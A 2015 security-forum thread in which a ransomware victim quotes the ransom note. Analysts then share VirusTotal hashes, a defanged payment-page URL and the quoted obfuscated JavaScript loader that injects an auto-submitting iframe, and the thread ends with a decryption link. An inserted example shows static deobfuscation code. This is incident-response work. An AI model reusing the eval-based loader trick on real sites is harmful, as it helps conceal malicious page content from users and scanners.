
All files encrypted


8 replies to this topic

#1 robbyrobby

robbyrobby

  • Members
  • 5 posts
  • OFFLINE
  • Local time:01:02 AM

Posted 03 May 2015 - 03:05 AM

all files encrypted with this message:
 
"Warning !! You have a computer found pirated content! All your files are encrypted! To decrypt files you need visit the site
http://utrozen.pixub.com and follow the instructions posted on it. If the site is for some reason unavailable
refer to the stoppirates@yahoo.com. Your id 335495.
 
You can enter a password 5 times. above this
limit, all files will be deleted! Independent attempts to decrypt the data can lead to Their loss. "
 
 
This virus has infected my computer. This is the Trojan horse TR/Crypt.Xpack.171354. He has encrypted all files. Avira has found that this virus has encrypted my files.
I cleared the virus. But how do I decrypt files?
thanks
Rob



#2 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,591 posts
  • ONLINE
  • Gender:Male
  • Location:Virginia, USA
  • Local time:07:02 PM

Posted 03 May 2015 - 06:45 AM

The BC staff has advised our Security Colleagues who specialize in crypto malware ransomware with a link to this topic.

Please submit a sample of an encrypted file here: http://www.bleepingcomputer.com/submit-malware.php?channel=3
with a link to this topic.

You can also submit samples of suspicious executables or any malware files that you suspect were involved in causing the infection. Doing that will be helpful with analyzing and investigating.

These are common locations malicious executables may be found:
%Temp%
%AppData%
%LocalAppData%
%ProgramData%
%WinDir%
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click [donation link]

#3 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • OFFLINE
  • Gender:Male
  • Location:::1
  • Local time:07:02 PM

Posted 03 May 2015 - 07:44 AM

If you can upload the binary to Mega and send me a link, I have a lot of time to review it today.

Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#4 robbyrobby

robbyrobby
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  • Local time:01:02 AM

Posted 03 May 2015 - 08:17 AM

Here is the link where you can download an encrypted image file

 

http://we.tl/1UyV4y0Ir2

 

thanks

rob

 



#5 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,614 posts
  • OFFLINE
  • Gender:Male
  • Location:USA
  • Local time:07:02 PM

Posted 03 May 2015 - 09:04 AM

Do you happen to have a sample of the infector or know how you received it?

#6 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • OFFLINE
  • Gender:Male
  • Location:::1
  • Local time:07:02 PM

Posted 03 May 2015 - 12:27 PM

Found a few VirusTotal analyses of several ransomware variants that I believe the topic starter has been infected with.

 

https://www.virustotal.com/en/file/60955c4a9effdafc1292072aa46c00cbad621753092df776526ce825a04784b7/analysis/

https://www.virustotal.com/en/file/334849263d928779c92fd3b6b2c006162c258a9351894f27ed19ebc3de80b689/analysis/

https://www.virustotal.com/en/file/af96ab7b714a96ca422746ba588167759c19dd8e07f78070937e8c5ad6950d41/analysis/

https://www.virustotal.com/en/file/b54c7af13b9efd9fe5a832aa52d221603ef4b02e841ef7e75d20db1d21081e98/analysis/

 

Really annoying that VirusTotal doesn't always (rarely does when I actually need it) provide the sample for download.

 

Found these samples after some brief recon using a source (sub)domain...  The ransom page displayed is actually an iframe containing content from an external domain.  The URL is obfuscated with two asterisks (**) representing the letter "t".  So...  not really obfuscated at all, ha.

 

The URL hosting the ransom payment page / instructions is below (edited for user safety).

 

hxxp://str.fulba.com/u4laglaqnm93fh/lending/US.php

Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#7 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • OFFLINE
  • Gender:Male
  • Location:::1
  • Local time:07:02 PM

Posted 03 May 2015 - 12:40 PM

For anyone that wants a laugh, here's the JavaScript used to print the iframe that contains the ransom/payment instructions...

 

str = 'documen**.wri**e(\'<iframe src="h****p://s**r.fulba.com/u4laglaqnm93fh/lending/**ds.php" wid**h="100%" heigh**="100%" frameborder="0" id="rform"><inpu** **ype="submi**"></iframe>\');documen**.ge**Elemen**ById(\'rform\').submi**();'
eval(str.split('**').join('t'));

Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com
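As an added example, not code from the thread or from White Hat Mike, the Node.js snippet below shows how an analyst can undo the split/join substitution quoted above statically, without ever passing the string to eval, and then pull the iframe target out as a defanged indicator. The loader line and payload it runs on are constructed to match the shape of the posted script; the domain ransom-example.invalid is a placeholder, not the real host, and the function names (findSplitJoinEval, deobfuscate, extractIframeSources, defang, analyse) are this example's own.

```javascript
// Added example, not the thread's code: static analysis of the
// "eval(str.split('**').join('t'))" loader quoted above. The inputs below are
// constructed; the domain is a placeholder, not the real one from the thread.

// Constructed loader line in the same shape as the one posted in the thread.
const SAMPLE_LOADER = "eval(str.split('**').join('t'));";

// Constructed payload: every "t" has been replaced by "**", as in the original.
const SAMPLE_PAYLOAD =
  "documen**.wri**e('<iframe src=\"h****p://ransom-example.invalid/lending/**ds.php\" " +
  "wid**h=\"100%\" heigh**=\"100%\" frameborder=\"0\" id=\"rform\">" +
  "<inpu** **ype=\"submi**\"></iframe>');documen**.ge**Elemen**ById('rform').submi**();";

// Recognise eval(<name>.split('<token>').join('<letter>')) and return both literals.
function findSplitJoinEval(script) {
  const re = /eval\(\s*\w+\.split\((['"])(.*?)\1\)\.join\((['"])(.*?)\3\)\s*\)/;
  const m = re.exec(script);
  return m ? { token: m[2], letter: m[4] } : null;
}

// Apply the same substitution the loader would, but on the string only.
function deobfuscate(payload, token, letter) {
  return payload.split(token).join(letter);
}

// Collect iframe src values from the reconstructed markup.
function extractIframeSources(html) {
  const re = /<iframe\b[^>]*\bsrc=["']([^"']+)["']/gi;
  const found = [];
  let m;
  while ((m = re.exec(html)) !== null) found.push(m[1]);
  return found;
}

// Defang a URL (http -> hxxp, "." -> "[.]") so it is safe to paste into a report.
function defang(url) {
  return url.replace(/^http/i, "hxxp").replace(/\./g, "[.]");
}

// Tie the steps together: detect the loader pattern, decode, and list IOCs.
function analyse(loaderScript, payload) {
  const params = findSplitJoinEval(loaderScript);
  if (params === null) return { matched: false, decoded: null, iocs: [] };
  const decoded = deobfuscate(payload, params.token, params.letter);
  return { matched: true, decoded, iocs: extractIframeSources(decoded).map(defang) };
}

console.log(JSON.stringify(analyse(SAMPLE_LOADER, SAMPLE_PAYLOAD), null, 2));
```

The point of doing the substitution on the string rather than executing the loader is that the decoded markup is available for inspection and for extracting the hosting domain without the page ever being rendered; the same findSplitJoinEval pattern can serve as a cheap signature for other loaders that use the split/join trick with a different token and letter.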


#8 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,614 posts
  • OFFLINE
  • Gender:Male
  • Location:USA
  • Local time:07:02 PM

Posted 04 May 2015 - 05:02 PM

If anyone is infected with this ransomware, please message me for a test.

#9 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,614 posts
  • OFFLINE
  • Gender:Male
  • Location:USA
  • Local time:07:02 PM

Posted 05 May 2015 - 04:01 PM

Here ya go:

http://www.bleepingcomputer.com/forums/t/575324/international-police-association-sopa-pipa-ransomware-easily-decrypted/



